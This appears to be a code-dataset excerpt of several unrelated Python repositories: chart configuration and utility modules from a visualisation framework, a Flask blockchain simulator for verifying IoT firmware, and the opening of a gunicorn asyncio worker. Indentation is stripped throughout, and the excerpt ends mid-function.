for attr in keys:
if attr in chart:
del chart[attr]
def _colors(self, cList, index=None):
"""
:category: Chart Series Colors
:rubric: JS
:type: Configuration
:dsc:
"""
if index is None:
for i in range(len(self.data._schema['values'])):
if len(cList) > i:
self.seriesProperties['dynamic'].setdefault(i, {})['backgroundColor'] = cList[i]
else:
self.seriesProperties['dynamic'].setdefault(index, {})['backgroundColor'] = cList
if __name__ == "__main__":
print(getConfigs(['ChartJs']))
```
#### File: js/configs/JsConfigVis.py
```python
from ares.Lib.js.configs import JsConfig
DSC = {
}
class JsBase(JsConfig.JsConfig):
""" Base Class for the Plotly Charts """
jsCls = 'Graph2d'
reference = None # The main link to get the documentation of this chart
_statics = None # Static configuration will be added to each data set automatically
jsType = None # Attach the chart to a family for the data transformation
_attrs = None
jsQueryData = '{xaxis: event.time, column: event.value[0], src: event}'
def __init__(self, aresObj, data, seriesProperties):
    # config() is already invoked by JsConfig.__init__, so it is not called a second time here
    super(JsBase, self).__init__(aresObj, data, seriesProperties)
def config(self):
if self._statics is not None:
self.seriesProperties["static"].update(self._statics)
@property
def options(self):
return self
# ---------------------------------------------------------------------------------------------------------
# VIS Configurations
# ---------------------------------------------------------------------------------------------------------
class JsBar(JsBase):
""" Configuration for a Bars Chart in Vis """
alias = 'bar'
name = 'Bars'
_attrs = {'style': 'bar', 'moveable': False, 'drawPoints': True, 'stack': False, 'orientation': 'top',
'barChart': {'align': 'center', 'sideBySide': True},
'dataAxis': {'icons': True}}
reference = "http://visjs.org/examples/graph2d/11_barsSideBySideGroups.html"
class JsLine(JsBase):
""" Configuration for a Bars Chart in Vis """
alias = 'line'
name = 'Line Plot'
_attrs = {'style': 'line', 'moveable': False, 'drawPoints': False}
reference = "http://visjs.org/examples/graph2d/01_basic.html"
class JsScatter(JsBase):
""" Configuration for a Bars Chart in Vis """
alias = 'scatter'
name = 'Scatter Plot'
_attrs = {'style': 'points', 'sampling': True, 'sort': False, 'defaultGroup': 'Scatterplot', 'moveable': False}
reference = "http://visjs.org/examples/graph2d/18_scatterplot.html"
#---------------------------------------------------------------------------------------------------------
# 3D CHARTS
#
class JsSurface(JsBase):
""" Configuration for a Box Chart in Vis """
jsCls = 'Graph3d'
alias = 'surface'
name = 'Surface Plot'
_attrs = {'style': 'surface', 'keepAspectRatio': True, 'verticalRatio': 0.5, 'showPerspective': True,
'showGrid': True, 'showShadow': False, #, 'height': '100%'
'backgroundColor': { 'strokeWidth': 0},
}
reference = "http://visjs.org/graph3d_examples.html"
class JsScatter3D(JsBase):
jsCls = 'Graph3d'
alias = 'scatter3d'
_attrs = {'tooltip': True}
reference = "http://visjs.org/examples/graph3d/07_dot_cloud_colors.html"
class JsBubble3D(JsBase):
jsCls = 'Graph3d'
alias = 'bubble'
_attrs = {'style': 'dot-size', 'tooltip': True, 'keepAspectRatio': True, 'showPerspective': True}
reference = "http://visjs.org/examples/graph3d/07_dot_cloud_colors.html"
class JsGroup3D(JsBase):
alias = 'series3d'
jsType = 'bubble'
_attrs = {'style': 'dot-color', 'keepAspectRatio': True, 'showPerspective': True, 'verticalRatio': 0.5, 'tooltip': True,
'showGrid': True, 'showShadow': False, 'legendLabel': 'color value', 'showLegend': False}
reference = "http://visjs.org/examples/graph3d/07_dot_cloud_colors.html"
class JsLine3D(JsScatter3D):
jsCls = 'Graph3d'
alias = 'line3d'
_attrs = {'style': 'line', 'tooltip': True}
reference = "http://visjs.org/examples/graph3d/05_line.html"
class JsBar3D(JsScatter3D):
jsCls = 'Graph3d'
alias = 'bar3d'
_attrs = {'style': 'bar', 'tooltip': True}
reference = "http://visjs.org/examples/graph3d/12_custom_labels.html"
class JsBarColor3D(JsScatter3D):
alias = 'barSeries3d'
jsType = 'bubble'
_attrs = {'style': 'bar-color', 'tooltip': True}
reference = "http://visjs.org/examples/graph3d/12_custom_labels.html"
#---------------------------------------------------------------------------------------------------------
# TIMELINE CHARTS
#
class JsTimeLine(JsBase):
alias = 'timeline'
jsCls = 'Timeline'
name = 'Basic Timeline'
reference = "http://visjs.org/examples/timeline/basicUsage.html"
#---------------------------------------------------------------------------------------------------------
# NETWORK CHARTS
#
class JsNetwork(JsBase):
jsCls = 'Network'
alias = 'network'
name = 'Basic Network'
reference = "http://visjs.org/examples/network/basicUsage.html"
```
#### File: ares-visual/utils/AresFncs.py
```python
import os
import inspect
import importlib
import logging
from ares.Lib import AresMarkDown
DSC = {
'eng': '''
Section dedicated to the functions. The below functions are system functions and are available in all the reports.
It is possible to extend this by adding report functions specific to your environment. Those functions will then be added to the aresObj automatically,
and it will then be possible to use them directly.
In order to get the functions loaded, it is important to have the below structure in the report:
/fncs
  __init__.py
  NewFncs.py
It is possible to add multiple functions in the same module.
Please also add the below documentation type to your functions; they will then be available here for the community!
It is possible to get functions from other environments by using the below line of code:
'''
}
def create(aresObj):
"""
:category:
:rubric: PY
:type: System
:dsc:
Load the System utility functions defined in the AReS core framework
:return: A dictionary with the list of available functions
"""
fncs = {}
for script in os.listdir(os.path.dirname(__file__)):
if (script == "AresFncs.py") or (script == "__init__.py") or not script.endswith(".py"):
continue
mod = importlib.import_module('ares.utils.%s' % script.replace(".py", ""))
functions_list = [o for o in inspect.getmembers(mod) if inspect.isfunction(o[1])]
for fncName, fnc in functions_list:
fncs[fncName] = fnc
if aresObj.run.local_path not in ("", None):
fncsPath = os.path.join(aresObj.run.local_path, 'fncs')
if os.path.exists(fncsPath):
for script in os.listdir(fncsPath):
if script.endswith('.py') and script != "__init__.py":
try:
mod = importlib.import_module('%s.fncs.%s' % (aresObj.run.report_name, script.replace(".py", "")))
functions_list = [o for o in inspect.getmembers(mod) if inspect.isfunction(o[1])]
for fncName, fnc in functions_list:
fncs[fncName] = fnc
except Exception as err:
logging.warning("%s, error %s" % (script, err))
# Add the Hash ID function
mod = importlib.import_module('ares.utils.AresSiphash')
fncs["hashId"] = mod.SipHash().hashId
return fncs
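# A minimal sketch (assumption, not shipped with the framework) of a bespoke
# report function module that create() would pick up from <report>/fncs/.
# The docstring tags below (:dsc:, :example:, :tip:) are the ones docEnum() parses.
#
#   # <report>/fncs/NewFncs.py
#   def my_helper(aresObj, value):
#     """
#     :dsc: Hypothetical helper, returns its input doubled
#     :example: aresObj.my_helper(2)
#     """
#     return value * 2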
def docEnum(aresObj, outStream, lang='eng'):
"""
:category: Functions
:rubric: PY
:type: Configuration
"""
fncsFactory = create(aresObj)
outStream.append(DSC.get(lang, DSC.get('eng', '')))
for alias, fnc in fncsFactory.items():
docDetails = AresMarkDown.AresMarkDown.loads(fnc.__doc__)
if 'tip' in docDetails:
outStream.title("%s ares:info<%s>" % (alias, "".join( docDetails['tip'])), level=3)
else:
outStream.title(alias, level=2)
outStream.append(docDetails.getAttr('dsc'))
outStream.title('Examples', level=4)
outStream.code(docDetails.getAttr('example'))
varNames = inspect.getargspec(fnc).args
if len(varNames) > 0:
outStream.title('Arguments', level=4)
for varName in varNames:
if varName == 'self':
continue
outStream.append("%s: %s" % (varName, outStream.params(varName)))
# Return the list of environments with functions
outStream.title("Environments with bespoke functions", level=2)
if hasattr(aresObj, 'reportsPath'):
header = ['Environment', 'Module', 'Functions']
data = []
for path in aresObj.reportsPath.values():
if os.path.exists(path):
for folder in os.listdir(path):
if os.path.exists( os.path.join(path, folder, 'fncs')) :
for file in os.listdir( os.path.join(path, folder, 'fncs') ):
if file != '__init__.py' and file.endswith('.py'):
fncNames = []
mod = importlib.import_module('%s.fncs.%s' % (folder, file.replace(".py", "")))
for o in inspect.getmembers(mod):
if inspect.isfunction(o[1]):
fncNames.append( o[0] )
data.append([folder, file, ",".join(fncNames)])
outStream.table(header, data)
outStream.src(__file__)
```
#### File: ares-visual/utils/AresUtilities.py
```python
import datetime
import traceback
import sys
import importlib
import types
import re
regex = re.compile('[^a-zA-Z0-9_]')
def cleanData(value):
""" Function to clean the javascript data to allow the use of variables """
return regex.sub('', value.strip())
def getDateFromAlias(aliaDt, fromDt=None):
"""
:category: Python Utilities - Date function
:example: getDateFromAlias("T")
:icon: fab fa-python
:dsc:
Return the date corresponding to an alias code like T, T-N, M...
:return: The converted date or a list of dates
"""
if fromDt is None:
cobDate = datetime.datetime.today()
else:
cobDate = datetime.datetime( *map( lambda x: int(x), fromDt.split("-") ) )
if len(aliaDt) > 1:
fType, fCount = aliaDt[0], "".join(aliaDt[2:])
else:
fType, fCount = aliaDt, 0
if fType == 'T':
for i in range(0, int(fCount) + 1):
if len(aliaDt) > 1:
if aliaDt[1] == '+':
cobDate = cobDate + datetime.timedelta(days=1)
while cobDate.weekday() in [5, 6]:
cobDate = cobDate + datetime.timedelta(days=1)
else:
cobDate = cobDate - datetime.timedelta(days=1)
while cobDate.weekday() in [5, 6]:
cobDate = cobDate - datetime.timedelta(days=1)
return cobDate.strftime('%Y-%m-%d')
if fType == 'M':
    # handle year rollover when going back more months than the current month number
    months = cobDate.year * 12 + cobDate.month - 1 - int(fCount)
    endMontDate = datetime.datetime(months // 12, months % 12 + 1, 1)
    endMontDate = endMontDate - datetime.timedelta(days=1)
while endMontDate.weekday() in [5, 6]:
endMontDate = endMontDate - datetime.timedelta(days=1)
return endMontDate.strftime('%Y-%m-%d')
if fType == 'W':
cobDate = cobDate - datetime.timedelta(days=1)
while cobDate.weekday() != 4:
cobDate = cobDate - datetime.timedelta(days=1)
cobDate = cobDate - datetime.timedelta(days=(int(fCount) * 7))
return cobDate.strftime('%Y-%m-%d')
if fType == 'Y':
endYearDate = datetime.datetime(cobDate.year - int(fCount), 1, 1)
endYearDate = endYearDate - datetime.timedelta(days=1)
while endYearDate.weekday() in [5, 6]:
endYearDate = endYearDate - datetime.timedelta(days=1)
return endYearDate.strftime('%Y-%m-%d')
return aliaDt
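# Worked examples (derived from the branches above; note the T branch loops
# range(0, N + 1) times, so "T-N" actually steps back N + 1 business days as written):
#   getDateFromAlias("T")  -> today's date, unadjusted (the loop body is skipped)
#   getDateFromAlias("M")  -> last weekday of the previous month
#   getDateFromAlias("W")  -> the last Friday strictly before the reference date
#   getDateFromAlias("Y")  -> last weekday of the previous year
# Anything not matching T, M, W or Y is returned unchanged.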
def getDates(fromDt, toDt, weekdays=True):
"""
:category: Python Utilities - Python Date function
:example: aresObj.getDates("2018-02-01", "2018-01-01")
:icon: fab fa-python
:dsc:
get the list of dates between two dates
:return: A list of string dates in the common AReS format YYYY-MM-DD
"""
resDt = []
startDt = getDateFromAlias(fromDt)
endDt = getDateFromAlias(toDt, fromDt=startDt)
dt = datetime.datetime( *map(lambda x: int(x), startDt.split('-')))
tgDt = datetime.datetime( *map(lambda x: int(x), endDt.split('-')))
resDt.append(startDt)
while dt > tgDt:
dt = dt - datetime.timedelta(days=1)
if not dt.weekday() in [5, 6] or not weekdays:
resDt.append( dt.strftime('%Y-%m-%d') )
return resDt
def getDateFromXl(xlDate):
"""
:category: Python Utilities - Python Date function
:example: aresObj.getDateFromXl(42948)
:icon: fab fa-python
:dsc:
Convert an Excel serial date to the AReS standard date format YYYY-MM-DD.
:return: The date as a String in the common AReS format YYYY-MM-DD
"""
dt = datetime.datetime.fromordinal(datetime.datetime(1900, 1, 1).toordinal() + xlDate - 2)
return dt.strftime('%Y-%m-%d')
def fakefunction(*args, **kwargs):
"""
:dsc: Simple wrapper to attach to classes or modules when we end up with a fake attribute
"""
return None
def parseAttrError():
"""
:dsc: Parse and fix AttributeError Exceptions
"""
current_mod = None
trace = traceback.format_exc().strip().split('\n')
missing_attr = trace[-2].strip()
if missing_attr.lstrip().startswith('class '):
missing_attr = missing_attr.split('(')[1].split(')')[0]
elif ' as ' in missing_attr:
missing_attr = missing_attr.split()[1]
elif ' ' in missing_attr:
missing_attr = missing_attr.split()[-1]
if '=' in missing_attr:
missing_attr = missing_attr.split('=')[-1]
for i, attr in enumerate(missing_attr.split('.')):
if i == 0:
current_mod = sys.modules[attr]
continue
if '(' in attr:
attr = attr.split('(')[0]
setattr(current_mod, attr, staticmethod(fakefunction))
continue
setattr(current_mod, attr, type(attr, (object,), {}))
current_mod = getattr(current_mod, attr)
def parseImportError():
"""
:dsc: Parse and fix ImportError Exceptions
"""
error_line = traceback.format_exc().strip().split('\n')[-2]
missing_names = []
if 'from' in error_line:
missing_mod = error_line.strip().split()[1]
missing_names = [attr.strip() for attr in ''.join(error_line.strip().split()[3:]).split(',')]
else:
missing_mod = error_line.strip().split()[-1]
previous_mod = []
for module in missing_mod.split('.'):
previous_mod.append(module)
current_mod = '.'.join(previous_mod)
if current_mod in sys.modules:
for attr in missing_names:
setattr(sys.modules[current_mod], attr, type(attr, (object,), {}))
continue
try:
importlib.import_module(current_mod)
except:
mod = types.ModuleType(current_mod)
for attr in missing_names:
setattr(mod, attr, type(attr, (object,), {}))
sys.modules[mod.__name__] = mod
def parse_error(file, error):
"""
:dsc: Import the required module in Python, handling errors by creating fake modules on the fly.
We just use a counter here to make sure we get out of the loop after 99 tries.
"""
counter = 0
mod = {}
while error:
counter += 1
if 'ImportError' in error.strip().split('\n')[-1]:
parseImportError()
elif 'AttributeError' in error.strip().split('\n')[-1]:
parseAttrError()
try:
mod = importlib.import_module(file.replace('.py', ''))
error = None
except ImportError as e:
error = traceback.format_exc()
except AttributeError as e:
error = traceback.format_exc()
if counter > 99:
return {}
return mod
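# Usage sketch (the module name below is hypothetical, not part of the original file):
#   try:
#     mod = importlib.import_module('some_report')
#   except (ImportError, AttributeError):
#     mod = parse_error('some_report.py', traceback.format_exc())
# parse_error() keeps patching fake modules / attributes until the import
# succeeds, giving up with {} after 99 attempts.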
```
#### File: ares-visual/utils/OrderedSet.py
```python
class OrderedSet(list):
"""
:category: Sets
:rubric: PY
:type: System
:dsc:
Create a ordered set object
"""
def __init__(self):
super(OrderedSet, self).__init__()
def add(self, key):
"""
:param key:
:return:
"""
if key not in self:
self.append(key)
```
|
{
"source": "JeaMinLim/ChainVeri_Sim",
"score": 3
}
|
#### File: JeaMinLim/ChainVeri_Sim/ChainVeri_sim.py
```python
import hashlib
import json
from time import time
from urllib.parse import urlparse
from uuid import uuid4
import os
import requests
from flask import Flask, jsonify, request
from datetime import datetime
import logging
import logging.handlers
from operator import eq
class Blockchain:
# Initialize the ChainVeri Blockchain
def __init__(self):
self.verification_info = []
self.chain = []
self.nodes = set()
# Create the genesis block
self.new_block(previous_hash='1', proof=100)
def register_node(self, address):
"""
Add a new node to the list of nodes
:param address: Address of node. Eg. 'http://192.168.0.5:5000'
"""
parsed_url = urlparse(address)
if parsed_url.netloc:
self.nodes.add(parsed_url.netloc)
elif parsed_url.path:
# Accepts an URL without scheme like '192.168.0.5:5000'.
self.nodes.add(parsed_url.path)
else:
raise ValueError('Invalid URL')
def valid_chain(self, chain):
"""
Determine if a given blockchain is valid
:param chain: A blockchain
:return: True if valid, False if not
"""
last_block = chain[0]
current_index = 1
while current_index < len(chain):
block = chain[current_index]
print(f'{last_block}')
print(f'{block}')
print("\n-----------\n")
# Check that the hash of the block is correct
if block['previous_hash'] != self.hash(last_block):
return False
# Check that the Proof of Work is correct
if not self.valid_proof(last_block['proof'], block['proof'], last_block['previous_hash']):
return False
last_block = block
current_index += 1
return True
def resolve_conflicts(self):
"""
This is our consensus algorithm, it resolves conflicts
by replacing our chain with the longest one in the network.
:return: True if our chain was replaced, False if not
"""
neighbours = self.nodes
new_chain = None
# We're only looking for chains longer than ours
max_length = len(self.chain)
# Grab and verify the chains from all the nodes in our network
for node in neighbours:
response = requests.get(f'http://{node}/chain')
if response.status_code == 200:
length = response.json()['length']
chain = response.json()['chain']
# Check if the length is longer and the chain is valid
if length > max_length and self.valid_chain(chain):
max_length = length
new_chain = chain
# Replace our chain if we discovered a new, valid chain longer than ours
if new_chain:
self.chain = new_chain
return True
return False
def new_block(self, proof, previous_hash):
"""
Create a new Block in the Blockchain
:param proof: The proof given by the Proof of Work algorithm
:param previous_hash: Hash of previous Block
:return: New Block
"""
block = {
'index': len(self.chain) + 1,
'timestamp': time(),
'transactions': self.verification_info,
'proof': proof,
'previous_hash': previous_hash or self.hash(self.chain[-1]),
'type': 1,
}
# Reset the current list of transactions
self.verification_info = []
self.chain.append(block)
return block
def new_verification(self, sender, model, firmware, version):
"""
Creates a new verification info to go into the next mined Block
:param sender: Address of the Sender (UUID, Public Key, etc.)
:param model: name of IoT device model
:param firmware: The hash value of firmware
:param version: firmware version
:return: The index of the Block that will hold this transaction
"""
self.verification_info.append({
'sender': sender,
'model': model,
'firmware': firmware,
'version': version
})
return self.last_block['index'] + 1
@property
def last_block(self):
return self.chain[-1]
@staticmethod
def hash(block):
"""
Creates a SHA-256 hash of a Block
:param block: Block
"""
# We must make sure that the Dictionary is Ordered, or we'll have inconsistent hashes
block_string = json.dumps(block, sort_keys=True).encode()
return hashlib.sha256(block_string).hexdigest()
def proof_of_work(self, last_block):
"""
Simple Proof of Work Algorithm:
- Find a number p' such that hash(pp') contains leading 4 zeroes
- Where p is the previous proof, and p' is the new proof
:param last_block: <dict> last Block
:return: <int>
"""
last_proof = last_block['proof']
last_hash = self.hash(last_block)
proof = 0
while self.valid_proof(last_proof, proof, last_hash) is False:
proof += 1
return proof
@staticmethod
def valid_proof(last_proof, proof, last_hash):
"""
Validates the Proof
:param last_proof: <int> Previous Proof
:param proof: <int> Current Proof
:param last_hash: <str> The hash of the Previous Block
:return: <bool> True if correct, False if not.
"""
guess = f'{last_proof}{proof}{last_hash}'.encode()
guess_hash = hashlib.sha256(guess).hexdigest()
return guess_hash[:4] == "0000"
# Instantiate the Node
app = Flask(__name__)
# Generate a globally unique address for this node
node_identifier = str(uuid4()).replace('-', '')
# Instantiate the Blockchain
blockchain = Blockchain()
def _getLogger(_logName, _logDir, _logSize=500*1024, _logCount=4):
if not os.path.exists(_logDir):
os.makedirs(_logDir)
_logfile = '%s/%s.log' % (_logDir, _logName)
_logLevel = logging.INFO
_logger = logging.getLogger(_logName)
_logger.setLevel(_logLevel)
if _logger.handlers:
for handler in _logger.handlers:
_logger.removeHandler(handler)
_logger.handlers = []
_loghandler = logging.handlers.RotatingFileHandler(_logfile, maxBytes=_logSize, backupCount=_logCount)
_formatter = logging.Formatter('[%(asctime)s] %(message)s')
_loghandler.setFormatter(_formatter)
_logger.addHandler(_loghandler)
return _logger
logger = _getLogger('trader', './log')
@app.route('/connect', methods=['POST'])
def connect_device():
# send connection result to IoT device
logger.info("\t /connect/device")
values = request.get_json()
# Check that the required fields are in the POST'ed data
required = ['ip', 'port', 'UUID']
if not all(k in values for k in required):
return 'Missing values', 400
device_uuid = values.get('UUID')
response = {
'your_UUID': device_uuid,
}
return jsonify(response), 201
@app.route('/information/you', methods=['GET'])
def send_information():
# Send this Trader`s information
logger.info("\t /information/you")
response = {
'trader_address': node_identifier,
}
return jsonify(response), 200
@app.route('/address/device', methods=['GET'])
def make_address():
# Generate and send random identifier(UUID) for IoT devices.
# This API is for simulations ONLY!!!!
logger.info("\t /address/device")
identifier = str(uuid4())
response = {
'identifier': identifier,
}
return jsonify(response), 200
@app.route('/dump', methods=['GET'])
def save_blockchain():
# save blockchain into file
logger.info("\t /dump Palatte")
if not os.path.exists('./palatte'):
os.makedirs('./palatte')
date = datetime.today().strftime("%Y%m%d%H%M")
file = open("./palatte/ChainVeri-" + date, 'w')
file.write("ChainVeri Blockchain " + date + "\n")
file.write(json.dumps(blockchain.chain, indent='\t'))
file.close()
# print blockchain data to client
response = {
'message': "Blockchain Saved",
'index': len(blockchain.chain),
}
return jsonify(response), 200
@app.route('/mine/<int:num>', methods=['GET'])
def mine_repeat(num):
logger.info("\t /mine %d times" % num)
start_time = datetime.now()
tmp = 0
while tmp < num:
#blockchain.new_verification(values['sender'], values['model'], values['firmware'], values['version'])
blockchain.new_verification('3767bef4-0ca6-40e3-b228-79cef1544311', 'IoT_Device', '1a3d2d32ada795e5df47293745a7479bcb3e4e29d8ee1eaa114350b691cf38d3', 'ubuntu-17.10.1-desktop-amd64')
mine()
tmp = tmp + 1
end_time = datetime.now()
delta = str(end_time - start_time)
response = {
'repeat': num,
'start_time': start_time,
'end_time': end_time,
'delta': delta
}
return jsonify(response), 200
@app.route('/mine', methods=['GET'])
def mine():
# We run the proof of work algorithm to get the next proof...
logger.info("\t /mine")
last_block = blockchain.last_block
proof = blockchain.proof_of_work(last_block)
# Forge the new Block by adding it to the chain
previous_hash = blockchain.hash(last_block)
block = blockchain.new_block(proof, previous_hash)
response = {
'message': "New Block Forged",
'index': block['index'],
'transactions': block['transactions'],
'proof': block['proof'],
'previous_hash': block['previous_hash'],
}
return jsonify(response), 200
def request_device_vinfo(_ip, _port):
logger.info("request vinfo to %s:%s" % (_ip, _port) )
_url = "http://" + _ip + ":" + str(_port) + "/verification/device"
data = {
'sender': "",
'model': "",
'firmware': "",
'version': "",
}
response = requests.post(_url, json=data)
return response
@app.route('/verification/new', methods=['POST'])
def new_verification():
logger.info("\t /transaction/new")
values = request.get_json()
# Check that the required fields are in the POST'ed data
required = ['sender', 'model', 'firmware', 'version', 'ip', 'port']
if not all(k in values for k in required):
return 'Missing values', 400
# request the given device's v-info from ip, port
response_from_device = request_device_vinfo(values.get('ip'), values.get('port'))
received_vinfo = response_from_device.json()
if not eq(values['sender'], received_vinfo['sender']):
    response_fail = {'message': 'verification failed, check sender field'}
    return jsonify(response_fail), 201
if not eq(values['model'], received_vinfo['model']):
    response_fail = {'message': 'verification failed, check model field'}
    return jsonify(response_fail), 201
if not eq(values['firmware'], received_vinfo['firmware']):
    response_fail = {'message': 'verification failed, check firmware field'}
    return jsonify(response_fail), 201
if not eq(values['version'], received_vinfo['version']):
    response_fail = {'message': 'verification failed, check version field'}
    return jsonify(response_fail), 201
# Create a new Transaction
blockchain.new_verification(values['sender'], values['model'], values['firmware'], values['version'])
response = {'message': 'verification will be added to Block'}
mine()
return jsonify(response), 201
@app.route('/chain', methods=['GET'])
def full_chain():
logger.info("\t /chain")
response = {
'length': len(blockchain.chain),
'chain': blockchain.chain,
}
return jsonify(response), 200
@app.route('/nodes/register', methods=['POST'])
def register_nodes():
logger.info("\t /nodes/register")
values = request.get_json()
nodes = values.get('nodes')
if nodes is None:
return "Error: Please supply a valid list of nodes", 400
for node in nodes:
blockchain.register_node(node)
response = {
'message': 'New nodes have been added',
'total_nodes': list(blockchain.nodes),
}
return jsonify(response), 201
@app.route('/nodes/resolve', methods=['GET'])
def consensus():
logger.info("\t /nodes/resolve")
start_time = datetime.now()
replaced = blockchain.resolve_conflicts()
end_time = datetime.now()
delta = str(end_time - start_time)
if replaced:
response = {
'start_time': start_time,
'end_time': end_time,
'delta': delta,
'message': 'Our chain was replaced',
'new_chain': blockchain.chain
}
else:
response = {
'start_time': start_time,
'end_time': end_time,
'delta': delta,
'message': 'Our chain is authoritative',
'chain': blockchain.chain
}
return jsonify(response), 200
if __name__ == '__main__':
from argparse import ArgumentParser
parser = ArgumentParser()
parser.add_argument('-p', '--port', default=5000, type=int, help='port to listen on')
args = parser.parse_args()
port = args.port
logger.info("Start trader: listen %s:%s" % ('0.0.0.0', port))
app.run(host='0.0.0.0', port=port)
```
#### File: JeaMinLim/ChainVeri_Sim/IoT_device.py
```python
import json
import logging
import logging.handlers
import os
import requests
from uuid import uuid4
from flask import Flask, jsonify, request
from netifaces import interfaces, ifaddresses, AF_INET
class DeviceInfo:
def __init__(self):
self.model_name = []
self.firmware_version = []
self.firmware_hash = []
self.UUID = []
self.trader_ip = []
self.trader_port = []
self.device_ip = []
self.device_port = []
# get the IoT device's IP address (use the first non-loopback interface)
_iface = interfaces()
_iface.remove(u'lo')
_iface = _iface[0]
_tmp = [i['addr'] for i in ifaddresses(_iface).setdefault(AF_INET, [{'addr': 'No IP addr'}])]
self.device_ip = ', '.join(_tmp)
# create UUID for IoT device
# self.UUID = str(uuid4())
self.resDevice_ip = []
self.resDevice_port = []
self.resUUID = []
self.vinfo = {'sender': [], 'model': [], 'firmware': [], 'version': []}
def _getLogger(_logName, _logDir, _logSize=500 * 1024, _logCount=4):
if not os.path.exists(_logDir):
os.makedirs(_logDir)
_logfile = '%s/%s.log' % (_logDir, _logName)
_logLevel = logging.INFO
_logger = logging.getLogger(_logName)
_logger.setLevel(_logLevel)
if _logger.handlers:
for handler in _logger.handlers:
_logger.removeHandler(handler)
_logger.handlers = []
_loghandler = logging.handlers.RotatingFileHandler(_logfile, maxBytes=_logSize, backupCount=_logCount)
_formatter = logging.Formatter('[%(asctime)s] %(message)s')
_loghandler.setFormatter(_formatter)
_logger.addHandler(_loghandler)
return _logger
logPrefix = "1ST"
logger = _getLogger('IoTdevice', './log')
device = DeviceInfo()
app = Flask(__name__)
@app.route('/verification/result', methods=['POST'])
def verification_result():
    return ''
@app.route('/verification/device', methods=['POST'])
def exchange_vinfo():
# init verification
logger.info("exchange vinfo")
values = request.get_json()
# Firmware data is essential
required = ['sender', 'model', 'firmware', 'version']
if not all(k in values for k in required):
return 'Missing values', 400
# save received vinfo
device.vinfo['sender'] = values.get('sender')
device.vinfo['model'] = values.get('model')
device.vinfo['firmware'] = values.get('firmware')
device.vinfo['version'] = values.get('version')
data = {
'sender': device.UUID,
'model': device.model_name,
'firmware': device.firmware_hash,
'version': device.firmware_version,
}
return jsonify(data), 201
@app.route('/verification/info', methods=['GET'])
def verification_info():
# trigger verification process
# caller should be a REST API client (Postman, cURL, etc.)
logger.info("verification")
# exchange V-INFO(Verification-related information)
response = {
'trader': {
'ip': device.trader_ip,
'port': device.trader_port
},
'requester': {
'ip': device.device_ip,
'port': device.device_port
},
'responder': {
'ip': device.resDevice_ip,
'port': device.resDevice_port,
},
'v-info': {
'sender': device.vinfo['sender'],
'model': device.vinfo['model'],
'firmware': device.vinfo['firmware'],
'version': device.vinfo['version'],
}
}
return jsonify(response), 201
@app.route('/connect', methods=['POST'])
def connect_device():
# send connection result to IoT device
values = request.get_json()
# Check that the required fields are in the POST'ed data
required = ['ip', 'port', 'UUID']
if not all(k in values for k in required):
return 'Missing values', 400
device.resDevice_ip = values.get('ip')
device.resDevice_port = values.get('port')
device.resUUID = values.get('UUID')
response = {
'message': 'connection established',
'ip': device.device_ip,
'port': device.device_port,
'UUID': device.UUID,
}
return jsonify(response), 201
def connect_to_device(self, _ip, _port):
logger.info("Connection check to %s:%s" % (_ip, _port) )
_url = "http://" + _ip + ":" + str(_port) + "/connect"
_data = {
'ip': device.device_ip,
'port': device.device_port,
'UUID': device.UUID,
}
response = requests.post(_url, json=_data)
return response
def triggerVerification(self, _IP, _PORT):
logger.info("send V-INFO to the other IoT device")
_url = "http://" + _IP + ":" + _PORT + "/connect/device"
vinfo = {
'ip': device.device_ip,
'port': device.device_port,
'UUID': device.UUID,
}
logger.info("send V-INFO to the other IoT device")
response = requests.post(_url, json=vinfo)
logger.info("send V-INFO to the other IoT device")
if response.ok:
values = response.json()
required = ['ip', 'port', 'UUID']
if not all(k in values for k in required):
return 'Missing values', 400
logger.info("send V-INFO to the other IoT device")
device.resDevice_ip = values.get('ip')
device.resDevice_port = values.get('port')
device.resUUID = values.get('UUID')
logger.info("\t V-INFO: revices V-NFO")
logger.info("\t V-INFO: ip \tport \tUUID")
logger.info("\t\t: %s, %s, $%s " % (device.resDevice_ip, device.resDevice_port, device.resDevice_UUID))
else:
logger.info("can not find other IoT device")
def log_device_info():
# print current device Info
logger.info("IoT node information: %s" % logPrefix)
logger.info("\t MODEL: " + device.model_name)
logger.info("\t SENDER(IoT device) UUID: " + device.UUID)
logger.info("\t FIRMWARE HASH: " + device.firmware_hash)
logger.info("\t FIRMWARE VERSION:" + device.firmware_version)
logger.info("\t IP address: " + device.device_ip)
if __name__ == '__main__':
from argparse import ArgumentParser
parser = ArgumentParser()
# set default config
# firmware
parser.add_argument('-tip', '--tip', help='Trader`s ip address ', default='127.0.0.1')
parser.add_argument('-tp', '--tport', help='Trader`s port number', default=5000, type=int)
parser.add_argument('-m', '--model', default='IoT_device', help='IoT device model name')
parser.add_argument('-s', '--sender', help='UUID of IoT_Device', default='3767bef4-0ca6-40e3-b228-79cef1544311')
parser.add_argument('-f', '--firmware_hash', help='Hash value of firmware',
default='2b93836c38833b26891345388ff5ddea60529b27a616b4539d432a3520d1c90b')
parser.add_argument('-v', '--version', help='firmware version in string', default='Fedora-Server-netinst-x86_64-27-1.6')
parser.add_argument('-ip', '--ip', help='This device IP', default='127.0.0.1')
parser.add_argument('-p', '--port', help='This device port number', default=5100, type=int)
args = parser.parse_args()
device.UUID = args.sender
device.trader_ip = args.tip
device.trader_port = args.tport
device.model_name = args.model
device.device_port = args.port
device.firmware_hash = args.firmware_hash
device.firmware_version = args.version
logger.info("Connection test with Trader")
response = connect_to_device(device, device.trader_ip, device.trader_port)
if response.ok:
try:
logPrefix = "1ST"
app.run(host='0.0.0.0', port=device.device_port)
logger.info("Start IoT device %s: listen %s:%s" % (logPrefix, '0.0.0.0', device.device_port))
log_device_info()
except:
print("You are not the first device")
device.device_port = device.device_port + 1
logger.info("Connection test with First IoT device")
device.resDevice_ip = '127.0.0.1'
device.resDevice_port = 5100
response = connect_to_device(device, device.resDevice_ip, device.resDevice_port)
logPrefix = '2ND'
logger.info("Start IoT device %s: listen %s:%s" % (logPrefix, '0.0.0.0', device.device_port))
log_device_info()
app.run(host='0.0.0.0', port=device.device_port)
else:
print("connection test fail")
```
|
{
"source": "jeamland/guvnor",
"score": 2
}
|
#### File: guvnor/guvnor/asyncio_worker.py
```python
import asyncio
import io
from itertools import count
import os
import urllib.parse
from wsgiref.handlers import format_date_time
from gunicorn.http.wsgi import base_environ
from gunicorn.workers.base import Worker
import h11
def environ_from_request(cfg, req, sockname, body):
target = req.target
fragment = None
query = None
target = urllib.parse.unquote_to_bytes(target)
if b'#' in target:
target, fragment = target.split(b'#', 1)
if b'?' in target:
target, query = target.split(b'?', 1)
environ = base_environ(cfg)
environ.update({
